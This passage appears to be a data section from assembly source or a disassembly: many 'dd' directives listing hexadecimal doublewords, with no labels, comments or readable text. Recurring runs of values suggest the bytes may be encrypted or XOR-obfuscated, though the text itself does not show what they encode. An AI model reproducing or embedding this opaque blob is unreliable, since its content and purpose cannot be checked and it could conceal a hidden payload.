dd 9D9FB85Ch, 0A836631Ah, 0B75E91B8h, 1DAE700Fh, 51FC76Fh
dd 28B6CAE1h, 4DADB1E3h, 68F65874h, 5931E941h, 0F95109E0h
dd 73066DAFh, 0E3A898C6h, 0DDE03890h, 1BD29D63h, 846456E2h
dd 0FD3F183Ch, 85683BAh, 0A8005258h, 38D38F50h, 9C2EF182h
dd 0D8E079F6h, 13D24DCFh, 4DA978E6h, 68F6232Ah, 85ED891Fh
dd 0A83641C1h, 74C07DD9h, 171198C6h, 0BEDB9205h, 2CE84B30h
dd 452078D0h, 5ED966C5h, 0B5EDE110h, 0A83664F6h, 0B75557B8h
dd 6D87FE0Fh, 88D626FAh, 8D038830h, 0C81666BCh, 42559570h
dd 58608E0Eh, 0C20132E4h, 4AC8AA50h, 17C098F0h, 0BEDC7205h
dd 72405D30h, 45AD5AA5h, 68F6062Dh, 8566D242h, 9E1E3205h
dd 18F6AC50h, 1712C9A0h, 0BEDC7605h, 0BD7F8030h, 0C8164496h
dd 56A79DB6h, 0E060B826h, 0A80058BCh, 0BEFAB07h, 0C672ABBBh
dd 88AC74D4h, 132A4DCFh, 0A0B378E6h, 68C01877h, 10B50D9Dh
dd 25595886h, 7E9CEEEDh, 1D6A70F0h, 8408C76Fh, 7F80D830h
dd 86693699h, 2CEE4C35h, 0F760F45Ch, 9E3BF225h, 47607D50h
dd 0E842AD74h, 8D88AB90h, 0A580D830h, 0FE396B65h, 0D54D4170h
dd 8568422h, 57F4AB58h, 7E1D7BAFh, 0E840AECCh, 8AF0BC9Fh
dd 0C401D830h, 0C8207940h, 69C17024h, 9D9FB810h, 0A83664A6h
dd 49303CD1h, 631098F0h, 0DAE05244h, 14B64DCFh, 8A578E6h
dd 0CD6D29h, 860AB98h, 93CACD4Fh, 0AA4BF866h, 0F62C2573h
dd 0FDE038A6h, 58055519h
dd 98204ECEh, 54E28D8Fh, 0C8E5B826h, 0A989DCBFh, 82BF850h
dd 174013FCh, 0E465B7A0h, 0EE80EE2Eh, 0FE1E1F55h, 68AA1970h
dd 0A0AB97Ah, 942ECD4Fh, 0B023F866h, 88C4970Fh, 1BE03891h
dd 36E84DBDh, 0D84A78E6h, 0FD3F4B22h, 856840Eh, 2D0F9835h
dd 48A0F910h, 0F6C2257Dh, 805138A6h, 0D77AF1D8h, 0C8B4102Fh
dd 439E1870h, 2C5431F6h, 0A95A7E4h, 0C5A0CE6Bh, 0DE5E084Dh
dd 60E18990h, 0D77F223Ah, 0D65DED5Dh, 68AA1846h, 860AC78h
dd 57530AB0h, 7E9CD2C5h, 0CC0415F0h, 8C75B584h, 7880EE70h
dd 432ACEDFh, 0A9D43C34h, 4262B0F0h, 0AA4A4AB1h, 43A3B242h
dd 6848BCB4h, 68213771h, 6C8B8938h, 0FADF68F4h, 7D9520h
dd 0E0608E2Ch, 0A80058ACh, 3096D675h, 0C660B6D0h, 0ADC502B0h
dd 50B8F615h, 0ED0000F5h, 278A1203h, 840F659h, 0F295A7E7h
dd 0C9A0CE6Bh, 0E8403434h, 0D8E05290h, 0BD7F8B67h, 0C81644FAh
dd 7D4495FBh, 80AB826h, 616B4353h, 4D48A95Dh, 0CE4098F0h
dd 88EA5CB5h, 72152767h, 4B204EEBh, 839014B4h, 867D01Bh
dd 158D58B0h, 4896E6C6h, 7DBFCBA7h, 88D604BAh, 7CFE18B5h
dd 0F448CD5Dh, 0CD431846h, 856AD94h, 0CF8DD5B0h, 63A0CE6Eh
dd 0B940F23Eh, 1D1F6BC6h, 28B6E416h, 0B6208053h, 964B895Fh
dd 34080D9Dh, 0A5B05886h, 58D556A2h, 12577090h, 0FA81C76Fh
dd 0A5893B27h, 22CB79A7h, 0A6EBD7FBh, 3408059Dh, 0CF35886h
dd 0F14B0FD7h, 0F2D567A3h, 8E00EACh, 1E95B38Dh, 0E25479D0h
dd 68B52818h, 0C2F54710h, 28006E8Bh, 7E9E9FEDh, 0F93498F0h
dd 968CBD57h, 2880D806h, 4DE678D0h, 68F62617h, 0F6685110h
dd 2DC7A74Fh, 4896ED24h, 684098F0h, 88E4FACDh, 8CFD23Dh
dd 0A64F17BEh, 48A67750h, 6D06D17Ch, 884F7891h, 2DCD9124h
dd 0C82FECD0h, 0ED8C5DF3h, 5CE1AA52h, 0C22D59B5h, 48E03850h
dd 7B40F730h, 0CD6D35C5h, 29C7D822h, 8625FC82h, 0DAEA35B1h
dd 46E5B455h, 0BB4514A4h, 48B97403h, 7810D978h, 0C66178C9h
dd 30C5D834h, 9C23FD80h, 0A49456F1h, 49F4AB10h, 0A6491CBEh
dd 45E02217h, 6937B21Dh, 0C1683BC4h, 29809F3Eh, 8C60F49Ch
dd 0E9C041F1h, 46A0BC5Eh, 0BC481FB9h, 7A6385Ch, 7A069862h
dd 0CC6E3DD9h, 68E9D823h, 9C29F987h, 0DFEA35AAh, 4DF2BD58h
dd 0AD5219F0h, 1DAF6150h, 7A06983Ch, 0CC6E3DD9h, 0B80C723h
dd 0C925F59Fh, 0A89471B0h, 5CA0AB59h, 0E94515B9h, 4FB45150h
dd 690C9863h, 0AC213DC4h, 98903FD4h, 5C0AA30Dh, 8BE533EAh
dd 1ECF0C4Ah, 60860703h, 418CBAD1h, 2B701E04h, 9AA5A26Ah
dd 0E7E0CF02h, 0BF20F68Fh, 20DA93C9h, 7427DB66h, 0C8E2141Ch
dd 0B80887BCh, 28D99A74h, 0A81E3BF3h, 48A0F850h, 0E84098F0h
dd 88E03890h, 2880D830h, 0C82078D0h, 68C01870h, 860B810h
dd 0A80058B0h, 48A0F850h, 0E84098F0h, 88E03890h, 2880D830h
dd 0C82078D0h, 68C01870h, 860B810h, 0C80058B0h, 77745DD3h
dd 6B4098C6h, 0BEDFE035h, 9F8FD830h, 9BAD6C93h, 23771768h
dd 83B0BB16h, 83247CF4h, 51D2F412h, 9B48DACBh, 9CA2B384h
dd 0A18C9A1Bh, 0FE1FAC45h, 0B0459170h, 0E3608E2Fh, 80C2DBB5h
dd 8AC121B2h, 6DC898F4h, 88D61CF6h, 2880BCD8h, 0C80010D0h
dd 0ED4D1870h, 8569B83h, 0DC1861E9h, 4C607B5Ch, 6DBF6F12h
dd 88D60724h, 2B592FF3h, 0FE041E5Dh, 97D0FB70h, 8EF4460h
dd 4A04B033h, 0DB3D71A6h, 6B40AED3h, 8D9438AAh, 5A83EA1Bh
dd 346EF5C0h, 0EB9E4328h, 0C14B82Ah, 0ABEB6A4Fh, 0A0B08AAFh
dd 17BF67A7h, 5CBF6BBh, 28B6E7E8h, 0FC6B7B88h, 0D04597B3h
dd 0CF608E2Fh, 9E3FEC35h, 48A0F850h, 0E87C70F0h, 0D6B3890h
dd 28B6E784h, 37D6EE38h, 68D8F08Fh, 0B5E3B810h, 0A8366704h
dd 0C1A88D50h, 0DE64976Dh, 777CD390h, 1EBF6CBDh, 4DAFBBD0h
dd 68F627C8h, 37D42D99h, 0ABE85886h, 7BA0F850h, 7BCB5B39h
dd 88E03810h, 0D66D3062h, 5D23872Fh, 68F627A8h, 72E36E13h
dd 2C0F58BCh, 48A0F957h, 0E850E273h, 881DBC9Fh, 6A0BD830h
dd 0C828DCh, 6B3FE78Eh, 3E5F6095h, 0F8C65BB0h, 0B120F0DAh
dd 6859ECF0h, 8B941669h, 0A3713370h, 29A17998h, 0B71FC7AFh
dd 44244191h, 447558FCh, 0CB68D309h, 674F6209h, 88E03827h
dd 0D6F85956h, 4D2F4AE3h, 68C018DBh, 85A3B46h, 0E28B5DC5h
dd 0C3A21340h, 0B9B19BFAh, 771E4A78h, 0F035DBCFh, 65204EEFh
dd 93B8D8F5h, 8E43C1Fh, 1DFF58B0h, 4896C788h, 161570A0h
dd 0DE3C76Fh, 28B6E7E8h, 0F7F8FD5Fh, 6CC31846h, 0C8E3EB34h
dd 0A7DB6BB2h, 5A43F0E6h, 0BB605170h, 8CC41C51h, 1A4C419h
dd 887B5CDCh, 9341F19Bh, 0D5DB6F1Fh, 538166C4h, 93CEBDF8h
dd 13C1AE84h, 774103C9h, 0D301F644h, 64955A06h, 93413E04h
dd 0FB385183h, 538146C4h, 0BBF8112Dh, 13C18E84h, 69C507D6h
dd 0D301D644h, 290547E0h, 0FD3F1E04h, 85687A8h, 5771B1EBh
dd 0CBFE07AFh, 7A98C32h, 4B1FC76Eh, 7084B230h, 37D54E38h
dd 2855908Fh, 6E608E36h, 0AA186908h, 4B4438B2h, 43267AF2h
dd 60B83EFAh, 0D77F2D2Bh, 4F28BA53h, 30C572A1h, 0F795B6F8h
dd 0ABFAD84Fh, 1810F323h, 0CE001DF2h, 634A38A6h, 70E8B217h
dd 0CBDAF87Ah, 79700005h, 0F79456F8h, 0A801E04Fh, 9A24F850h
dd 8919584h, 7E0BF26Eh, 2838DDDBh, 63A078D0h, 0E503A792h
dd 3E580885h, 5FD773B0h, 0CD573B8Ah, 0E876A055h, 80E03890h
dd 0E9404D3Fh, 4DD67330h, 68F620D3h, 6E66CD11h, 4325D1BDh
dd 0EB250E43h, 0EA40AEC8h, 85863EE5h, 2C6BFD01h, 0ED2175B6h
dd 0D428B316h, 839F47EFh, 3D896CF3h, 4896C79Ch, 6DB75B5Bh
dd 88D60035h, 2080D830h, 0CCE0EDDFh, 0F428B2CCh, 819F47EFh
dd 9E3F8825h, 0EB250E50h, 0E940AEC8h, 0B9EF3CE5h, 0E8ABDADBh
dd 4DD7BB7Bh, 68F620D5h, 60B810h, 2D8A7FC4h, 4896C0CFh
dd 8E4B7831h, 0EEA5B39Dh, 8278689Bh, 0F0BFFD5Ah, 88011846h
dd 6C07BD0Bh, 9BAB5E39h, 0A30B9E90h, 672420E2h, 24B3895h
dd 1EB847B5h, 9787CD0h, 0AB6B0090h, 288B44A0h, 0A8EBE0D6h
dd 514B5336h, 189C9Ah, 771FCB6Fh, 0E952DCBDh, 0CD467030h
dd 0C3A6D8F9h, 98D0BBFBh, 0F002321Ah, 0B7531EB8h, 9C921C0Fh
dd 0D0E852A2h, 0D77302D8h, 0BAEA862Fh, 96056CB3h, 0F6A9CCDAh
dd 56DB2C7Ah, 0B6AC8C9Ah, 164CEC3Ah, 38EC4C5Ah, 984D33C9h
dd 78E9932Dh, 0D805F385h, 0CBA153E8h, 90B0E53Dh, 0CD57F866h
dd 0E876A055h, 8E03890h, 4830DB44h, 6DA58F7Ah, 68C02E48h
dd 7C68B810h, 2355E0B7h, 70BF8BCh, 0D0E51D07h, 88E338A6h
dd 0AC8FD930h, 0C8207807h, 0C36AF0C0h, 37DC0599h, 40B05886h
dd 0F52953FAh, 0E876A730h, 0B045BD67h, 2883D806h, 0DD5478D0h
dd 50659D87h, 860B826h, 0AD7459B0h, 0B75E39B8h, 42A9280Fh
dd 3465B33Bh, 0A380EE0Fh, 41E8531Fh, 5EFFDCCDh, 0F4283110h
dd 57643F08h, 88935366h, 6DB73396h, 88D60035h, 2880D833h
dd 4DD676A4h, 68F620D3h, 0E065CC90h, 57FFA6F2h, 0C1C49FE8h
dd 287333D6h, 0D1793F6h, 28B6E095h, 0C82078D3h, 0ED364D04h
dd 85680B3h, 40052D30h, 0B75F064Eh, 17BD3C18h, 60C0886Fh
dd 0D77F2386h, 70464133h, 0C3A60D8Fh, 9DEB1381h, 0A8366015h
dd 8A572AA7h, 0E84098F3h, 0F6082CE5h, 987F27CDh, 33B090CFh
dd 0D0A6E78Fh, 0A306ADEFh, 678BF321h, 77647DDBh, 206B98C6h
dd 7F1C7019h, 1EB87DB5h
dd 0C8207BD0h, 9FEE6C70h, 3E581D95h, 0A80058B0h, 0BF828C56h
dd 0DE783D75h, 88E03890h, 0C085AD31h, 37DF8522h, 50659D87h
dd 860B826h, 0AD745CB0h, 0B75EF5B8h, 4DC56F0Fh, 8CE00EA8h
dd 5C80D830h, 364790C7h, 4178E78Fh, 0A3A846D0h, 0DCC05008h
dd 3D185354h, 43277308h, 0B045BD67h, 2888D806h, 875578D0h
dd 5063A5F0h, 7C60B826h, 563BB0F6h, 611807AFh, 0E289B1E8h
dd 0BED8A735h, 2B641830h, 0F0BFDDDAh, 0D86B1846h, 8DEA12A1h
dd 0A8366013h, 42E048FAh, 0DE780775h, 30869290h, 0AD7725D2h
dd 0C8164075h, 68C01860h, 41D0BF64h, 0DDB83E1Ah, 0F80B9EACh
dd 28733218h, 205DB13Bh, 0DF80EE0Fh, 0FE18DD55h, 68C03870h
dd 0B869CD10h, 358552E8h, 0E2A0CE68h, 28C12096h, 0B045BD67h
dd 28C0D806h, 0CB5478D0h, 62E8DCF0h, 3E5825B5h, 21AB3EB0h
dd 7E9F54EDh, 6DB733F0h, 88D60035h, 6880D830h, 989071A5h
dd 505D9D72h, 0FFCAB826h, 9E38FD35h, 48A07850h, 584BEDF0h
dd 16653228h, 8280EE08h, 7046453Bh, 0ED370041h, 85680B5h
dd 0A80059B0h, 6110FA24h, 0D0DE3DFAh, 6C2038A6h, 0B625D233h
dd 0AE204EE8h, 0E9787EDBh, 0ADE54FE0h, 0A8006E88h, 3DA0F852h
dd 0E2882CF2h, 0BED8A635h, 0A12BBE30h, 0FE1FB06Dh, 4070A070h
dd 0FFCBB810h, 9E38FD35h, 48A0F050h, 31ECF0h, 771FC5A1h
dd 10255DC7h, 0CC2078E6h, 63B51870h, 8D6A00A0h, 0A836602Fh
dd 0BFED13FAh, 0DE783D75h, 88E83890h, 4E91AD30h, 0C2C0FB68h
dd 5EF887D5h, 3BCBDE10h, 0BDEBF270h, 50894036h, 0D0DF3DFAh
dd 6C2038A6h, 0B725D233h, 0AE204EE8h, 0CD45EFDBh, 8608E28h
dd 0CE0058A0h, 3C6079E8h, 0E08418F3h, 0B07F9D9Ah, 83E6D806h
dd 6BA5CEDFh, 0C3C02E48h, 0F79C78F8h, 0D85AF4Fh, 48A0CE68h
dd 9C0098F0h, 8AB08899h, 1EB845B5h, 4DD7D2D0h, 68F620D5h
dd 8609810h, 0AA75DE00h, 72DFC54h, 75E5120Eh, 1E00EA8h
dd 1EBF68BDh, 488B1ED0h, 6FB51D8Ch, 47E0B8A0h, 40AA184Fh
dd 0B75F0429h, 0D0E51D07h, 0C8E038A6h, 90E6D830h, 0CA5549B6h
dd 0C3A631C4h, 8D6AA0A0h, 0A836602Fh, 0E2A31890h, 17BCCC18h
dd 7F68886Fh, 1EB87DB5h, 0C8A078D0h, 0D8C26D70h, 95C53296h
dd 0CE006E88h, 4D5C78FBh, 0E8F09F85h, 0C81F7710h, 0D4AB309Ah
dd 4DD7872Fh, 68F620D5h, 861B810h, 0E8B053C5h, 703D7D5Ah
dd 3EA98C6h, 0B585E9Fh, 0B525D2F0h, 0AE204EE8h, 0C2C1A8DBh
dd 30C53DE7h, 0A8005886h, 67D5F852h, 0D0E51D07h, 88E038A6h
dd 32F5D834h, 4D2AB860h, 68F620EFh, 30C41D9Ah, 48C15886h
dd 2E189E40h, 0E8F03371h, 0C850307Bh, 101F5D3Ah, 3F8A78E6h
dd 5EF8BDF5h, 60B810h, 0CE102DB0h, 42487BE8h, 0DE780655h
dd 384B5E90h, 98883331h, 56A57298h, 0C2C02E48h, 30C53DE7h
dd 0A8005886h, 3D11F840h, 5026BD85h, 2DEAC013h, 28B6E0AEh
dd 813D3B6h, 0D87D31DAh, 0FF608E2Fh, 9E38FD35h, 68A0F850h
dd 595FEDF0h, 0EEFBD3E7h, 2298D188h, 0FE18E675h, 6B24D870h
dd 30FE1D1Ah, 3665886h, 77104579h, 29CA98C6h, 0B7509D1Ah
dd 83E6D806h, 4D222060h, 68F620EDh, 0ADE54FBAh, 0AB006E88h
dd 3CA1F850h, 4DC56FD2h, 88E00EA8h, 5D84D830h, 6DA58FC6h
dd 68C02E48h, 7D63B810h, 5284B0B5h, 0E34807AFh, 1FBF670Ah
dd 0BED89D15h, 2880D830h, 78230CD8h, 0ED37B2B9h, 85680B5h
dd 280058B0h, 4F10D824h, 0D0DD1DDAh, 682138A6h, 2009D52Ah
dd 6D2278F4h, 68F620EDh, 88635CD0h, 18AB5C74h, 0F0C65231h
dd 4D4A780Fh, 88D6000Dh, 0AD777356h, 0C8164075h, 68C01850h
dd 8D97EB64h, 0A8366015h, 68A0F850h, 2FB79584h, 88E03893h
dd 0B830DD44h, 43D3937Ah, 0C04D93B7h, 23608E2Fh, 5441D171h
dd 0CDAAA0E0h, 0E876A06Dh, 2D65CF3Ah, 2880EE08h, 0BC2038D0h
dd 38787E7Ch, 95E5B2D3h, 43006E88h, 0B7189E5Ah, 75E59210h
dd 0EEE00EA8h, 8D052F9Bh, 0CB204EE8h, 1CC11870h, 0ADE54F63h
dd 0A8006E88h, 3C80F850h, 0EB876FFDh, 0FCE03890h, 82106835h
dd 7AB8B3Bh, 57009DFBh, 0C04BB826h, 9BFC1039h, 0ED250F99h
dd 0E840AEC8h, 0FDE0B890h, 0B505553Eh, 42204EE8h, 91405878h
dd 8598CB13h, 8C4495B4h, 0A861F840h, 43CB28F8h, 30863E73h
dd 83E61801h, 48AFC0B6h, 68C0A018h, 6E81BA10h, 2DAB001Bh
dd 2EA68D99h, 8E80A948h, 2223883Bh, 10305DBDh, 4DD778E6h
dd 68F620D5h, 1860B810h, 83575EC5h, 514BA0A8h, 0C368CB7Bh
dd 3301368h, 1EBF10BDh, 60B579D0h, 69C02E4Fh, 2C243329h
dd 0CFBDD1B4h, 0C3A0CE40h, 0DE7F344Dh, 20651390h, 0DF80EE0Fh
dd 0FE18DD55h, 68C05870h, 0FF62CC10h, 0ACC2F368h, 0CBF7AE50h
dd 0DE7F784Dh, 0CEF3890h, 2880D9E9h, 0C8207538h, 3A855370h
dd 3B2CFD5Eh, 0E4447682h, 0DD5FF81Ch, 0E876A362h, 0B714BD19h
dd 0A3D3D806h, 10234488h, 0E3E86B8Fh, 0E8888C53h, 23FFA745h
dd 7E9F2CC5h, 0AA43C3F0h, 7065B19Ch, 2B80EE0Fh, 4DA97092h
dd 68F6278Ch, 0F748CB9Bh, 0A800D803h, 0BD191050h, 55CB670Fh
dd 88D60744h, 0DD2D3066h, 5DAB872Fh, 68F627A4h, 0B68F29Bh
dd 662B54FAh, 47A511D3h, 0E841F878h, 0D2643790h, 2B80D831h
dd 0FE1FA065h, 0F0751B70h, 0A4608E2Fh, 2D0FB08Ch, 48A0F8F2h
dd 0C344DE7Dh, 0BEDFA015h, 7886DB30h, 37D51238h, 0BC7D9B8Fh
dd 8608E2Fh, 0EF3B53C5h, 5323F75Ch, 34098F1h, 5C75019Ch
dd 2780EE0Fh, 0C8217555h, 0F0451B70h, 6E608E2Fh, 8DFF6031h
dd 485C7D5Fh, 0A8CB98F0h, 0BCA31392h, 0DDAD3060h, 7519872Fh
dd 68F627A4h, 8843D1Fh, 2D0358B0h, 4896C788h, 0D7D81DF3h
dd 886B38A6h, 278C9F1Bh, 0C820B552h, 60872370h, 8A43B1Fh
dd 688358B0h, 5CE7FB52h, 0D7D81DF3h, 0D8B238A6h, 17746DCFh
dd 5DDF78E6h, 68F62322h, 7A03D4Ah, 0A800EF35h, 483C1150h
dd 177C98F0h, 8874BD9Fh, 1600D830h, 43A577C5h, 0E3C01870h
dd 4B4BB956h, 14E80884h, 715F07A4h, 0DE7F4C4Dh, 8B974D90h
dd 1EBF00B5h, 50A57BD0h, 0E1C02E4Fh, 3E20B895h, 9300D3B0h
dd 7E9F00D5h, 0D348EAF0h, 0BEDFC415h, 15E9AA30h, 0B82078D0h
dd 77282F02h, 8560B810h, 698BA4FEh, 0AA3FA7Bh, 0E8C5A3E0h
dd 0FDE00ED0h, 38445B3Ch, 8CAF492Fh, 83A10454h, 8DEF7B0Bh
dd 0A8366708h, 0D0157330h, 40AECFh, 771FCDCAh, 28807151h
dd 0C655F8D0h, 1ACC5F5Bh, 278319h, 573CDABFh, 47E907AFh
dd 17BE2A75h, 0ACDCB36Fh, 257FB1h, 37DF78D0h, 2A2B678Fh
dd 6844F291h, 0E6E058B0h, 442B3863h, 8C51FD4h, 1E00EAFh
dd 1EBF04B5h, 6199F5D0h, 6BC01858h, 3E5F2095h, 0DA53EB0h
dd 4B66D31Eh, 0AA6B8CB2h, 73A6FE9Ch, 7A011FD8h, 0CD2078D0h
dd 0E1C01870h, 563F4456h, 3DFF0F73h, 4896C3CEh, 0E75F7031h
dd 88E12215h, 42D48830h, 37DF12F8h, 5EFBE6E5h, 57A03D10h
dd 0A905D0BFh, 848F850h, 0BF6715h, 88E03881h, 6EF4BD63h
dd 9B4514B9h, 1AB57B15h, 4919CC79h, 0C4B5A7B0h, 0B7A0CE6Fh
dd 0DE7BCA65h, 0FC65B190h, 0C080EE0Fh, 0C82078C9h, 9947D23h
dd 7F2FDD7Bh, 0DB723DDEh, 18D09138h, 8136F182h, 0ED875DFCh
dd 39688F30h, 20DF8739h, 68C01863h, 6D32DD43h, 0DA6F2CC3h
dd 21D2A835h, 8D2CF186h, 0DFE05DF7h, 0D7682BD8h, 0C832902Fh
dd 0D931870h, 6303D952h, 0DA5028C5h, 24C98E39h, 0E825FF95h
dd 6036D0C7h, 306827CFh
dd 9B2078D0h, 9A85B15h, 4605DF7Eh, 0CE692CDFh, 21D2A829h
dd 8D2CF186h, 0DFE05DF7h, 0D7686BD8h, 4574282Fh, 5EFAA8F5h
dd 5804D210h, 575759DAh, 7E9CF2C5h, 0CC7C11F0h, 0B3A6AD6Fh
dd 0E8AAD806h, 0F648C55Dh, 38901846h, 0B8D54740h, 0C0006E8Ah
dd 48A4F851h, 0BF41F2A4h, 0B794AD6Fh, 42D4D806h, 5DDF2FD4h
dd 68F62704h, 0F7747C93h, 9E3F3405h, 0CA350750h, 0B740AECBh
dd 0E055B553h, 7E80EE0Eh, 0F3A6ED2Fh, 90431846h, 0B3E4B7EFh
dd 210058B0h, 7E9F80D5h, 0BE40F2F0h, 0B322AD6Fh, 0E805D806h
dd 0C884FCDFh, 0A8EB1870h, 0B0AE840h, 0C00132E0h, 88A0F850h
dd 8AD567A6h, 0BE00EABh, 0AC8F27C8h, 0C8207D38h, 57BC9DF9h
dd 85EDB826h, 0A8366730h, 77286DDDh, 0BA1198C6h, 77B038FAh
dd 1EBB56A5h, 37D8FBD0h, 6D769C7Fh, 80AB810h, 977CED4Fh
dd 0DD5FF866h, 0E876A37Ah, 871FC013h, 288547B4h, 58A5F1D0h
dd 5BC02E4Fh, 59A3BBD9h, 0AC6A09E0h, 34150701h, 1740AECFh
dd 0BEDB5E05h, 27405D30h, 0C8250354h, 0E1092B70h, 3E5F2C95h
dd 0F95109B0h, 47A0E738h, 7DBFC8F0h, 88D6033Eh, 0AC8F18B5h
dd 0C8207DE4h, 57589DF9h, 0B0A3B826h, 0A80028B8h, 0BF98B3DBh
dd 0DE783D75h, 88E03890h, 2B86AD20h, 0FE301F55h, 6B122B70h
dd 0FF914FD1h, 0C85D151h, 0F0A0CE6Fh, 0E840B05Fh, 8BDC731Bh
dd 1E90BFB5h, 0CBF24BD0h, 9F31EFB1h, 94E531F1h, 6B006E8Fh
dd 4EEB4F5Fh, 65757B09h, 3FEF20C3h, 0F883CC73h, 0E0E11399h
dd 5241C873h, 6609CF4Fh, 2B1D2C49h, 3AA1F42Ah, 0D40B1310h
dd 8BF47A1Bh, 6C0DC872h, 11D78798h, 0EDFBD953h, 8568780h
dd 8C54D373h, 0C760CB40h, 0E8402072h, 476BFB90h, 950DD3DBh
dd 0C81646B8h, 5B1F938Ch, 695C14D9h, 0D23C5EC2h, 688CFA27h
dd 9C1CA45Ah, 0FCCE047Ch, 5D80E4EDh, 43E99B38h, 30852571h
dd 314B855h, 0FA430B8Dh, 7B25F750h, 63BF670Fh, 0C1B70593h
dd 0AC8F9B7Eh, 37DF87F6h, 3D834F4Dh, 13E4B75Eh, 95FFA74Fh
dd 7A93BB07h, 17501CFFh, 0D8DDC76Fh, 27CF8C63h, 37DF7D54h
dd 801B2B8Fh, 0F79F463Dh, 52E848C5h, 0A05F07ACh, 17BF66D1h
dd 760CBC9Fh, 0FAB327CFh, 0C8206E38h, 97A3F070h, 88847EFh
dd 0F50058B0h, 7BF315D1h, 33A998C6h, 0ECE03893h, 9D0BEACFh
dd 0C8164748h, 0EE29114h, 522D8691h, 0ABC4DDBFh, 162BF850h
dd 8E9E9BCCh, 0CDB00311h, 2B345D3Fh, 8BD778D0h, 68E01866h
dd 0AFE5B710h, 5E0058B3h, 47A2A413h, 0E8430574h, 80A3B390h
dd 8820780Dh, 47A47770h, 55C01873h, 28409830h, 0AB84DCBFh
dd 0F148F850h, 0E7BF670Eh, 88E34112h, 0F4255B30h, 0C8204EEFh
dd 0E3C85AFBh, 0C94BA85Ah, 68335CC3h, 80A3FDBBh, 6150D279h
dd 0BEDF9815h, 24CADB30h, 0C9207868h, 0F8284970h, 389F47F7h
dd 9E38FB25h, 78804950h, 0DE783C45h, 76C05290h, 3CF880F9h
dd 37C70E38h, 67129D8Fh, 0EAB37A84h, 90A5CD81h, 0AD4BF866h
dd 0D0E51D07h, 88E038A6h, 0AF4D930h, 0F085FD27h, 68C31846h
dd 415B810h, 90A5FD31h, 0B75FF866h, 0E2AB630Fh, 0B045B511h
dd 2880D806h, 0CE4870D0h, 31C01870h, 860BE78h, 80E800B0h
dd 0C25F07B7h, 0DE780575h, 0A264BE90h, 28B6E0ADh, 0F0BDFD58h
dd 88221846h, 30C53DE7h, 0A8085886h, 41D5F850h, 0D0DF2570h
dd 0FCE138A6h, 8D052FF5h, 0C8204EE8h, 1CC81870h, 95DD380Bh
dd 0AD006E88h, 0F5204824h, 0E876A06Eh, 8474C95h, 1EB8478Dh
dd 56547DD0h, 50659D87h, 860B826h, 0A174D8B0h, 703D45D0h
dd 9F4298C6h, 6845BB19h, 2880EE0Fh, 37D37F38h, 95A1F08Fh
dd 788847EFh, 230058B2h, 7E9F64CDh, 48DD9BF0h, 60E00EAFh
dd 0D77F2449h, 0CA70FCDFh, 0DD4B1870h, 8568788h, 0AB3C063Bh
dd 0B5DA108Eh, 6A4F670Fh, 88E03AAAh, 48A492B1h, 43C078D0h
dd 6B964A8Eh, 7263AC6Ah, 0D85AFA0h, 48A0CE68h, 9D5098F0h
dd 6C5DB184h, 0A580EE0Fh, 0FE18C865h, 0F4D9370h, 0FB608E00h
dd 84B90F14h, 0C5A0F85Ah, 0DE509845h, 3945CB90h, 0DB823B30h
dd 6DA58F74h, 68C02E48h, 770B810h, 0A800F634h, 60D30750h
dd 17AE2E18h, 5C75B36Fh, 0AD80EE0Fh, 50A47702h, 0E3C01870h
dd 3E5F20A5h, 0B84AD3B0h, 2884B2D1h, 0C3A098F0h, 8A9330DAh
dd 5A831103h, 0AFAD43C4h, 0E3C02E60h, 3E70DF9Dh, 23562AB0h
dd 0ED23DC6Ch, 0E8768897h, 0EF47BB90h, 2880D830h, 0C928025Bh
dd 9FC3103Ah, 8DEB4F97h, 0A836671Ch, 70057DA7h, 0E80098C6h
dd 8A943890h, 5A83C0C7h, 411051DCh, 5EFFF8C5h, 20133310h
dd 2DF768B1h, 4896C0F5h, 0E84098B0h, 90173AE4h, 0D4C93061h
dd 2379872Fh, 40B31B7Ch, 596CCA3Bh, 0F7A4ABE6h, 0F8157509h
dd 6140AEC8h, 0BEDFDC2Dh, 77242B30h, 5A11778Eh, 68139FFDh
dd 9D5AB810h, 0A8366013h, 9AC9FE25h, 0FA74CE88h, 60106818h
dd 0D77F0290h, 0C46AF38Ah, 9FD05273h, 3E581D95h, 0A80058B0h
dd 4DE17540h, 65C98B85h, 88D60770h, 38E75D33h, 6FA378E6h
dd 68C01817h, 20239310h, 0A852DF39h, 0CD57F850h, 0E876A490h
dd 88E03891h, 6B47DF44h, 6880D8D8h, 0CD45EFD0h, 8608E28h
dd 0DC8058B0h, 3248AA57h, 0B2BF6707h, 0B700B51Bh, 2D63D806h
dd 23083359h, 0B44D937Dh, 0EB608E2Fh, 2303B3B2h, 0CD57D01Bh
dd 0E876A055h, 88E03893h, 0AD0BCC44h, 0C8164734h, 57109573h
dd 8D63B826h, 0A836677Ch, 22BF051h, 74C513E0h, 0B1E00EAFh
dd 2BF3D07Ah, 0C9283259h, 0B430832h, 8DEBB848h, 0A8366714h
dd 48884838h, 0E00299F0h, 0D8A339C9h, 10234DBAh, 4DD778E6h
dd 68F620D5h, 1860B810h, 25035EC4h, 4896E837h, 6DB79846h
dd 88D60035h, 2882D830h, 0EDE6CA5h, 50659D87h, 860B826h
dd 0AE7558B4h, 70044DDAh, 6DB798C6h, 88D60035h, 28809830h
dd 0CFAA73A5h, 6A6ADA72h, 0E3975AC6h, 9A07D2B9h, 9EA25292h
dd 3A736F12h, 0ECC2B3F4h, 0ABD8DABFh, 0FE1F046Dh, 0ECCF1870h
dd 0F79F42CEh, 9798ED4Fh, 0DD5FF866h, 0E876A322h, 0B7748D6Fh
dd 0BD7FD806h, 0C8164396h, 574095FDh, 9DEDB826h, 0A8366738h
dd 48CAAA01h, 0D73C2D0Fh, 1D1F38A6h, 28B6E3F6h, 0F75CCD2Fh
dd 0FD3F1846h, 8568356h, 9668ED3Dh, 0FD5FF866h, 0E876A788h
dd 4A75C7C6h, 0AB80EE0Bh, 0FE1F0475h, 80031870h, 860B810h
dd 290132EDh, 7E9748BDh, 0E7B0C0F0h, 9D94BD51h, 0E805D806h
dd 37E8FB13h, 0ED011780h, 856AD64h, 0A8106573h, 54D5F87Ah
dd 0CC3C1996h, 0FD91549Ch, 0EC68B823h, 0BDDF872Fh, 9214F075h
dd 0DA8847EFh, 0C9FFA74Fh, 308D077Eh, 5052ACA6h, 88E038B5h
dd 0D7253050h, 0F155872Fh, 58E45CFBh, 36080D9Dh, 0F88B5886h
dd 72219E58h, 0CD339AF6h, 88E050C6h, 0EC0BD8CFh, 987278BAh
dd 54D28D8Fh, 0CCE3B826h, 0F43ED9B8h, 3DFCC76Fh, 0EC861BF3h
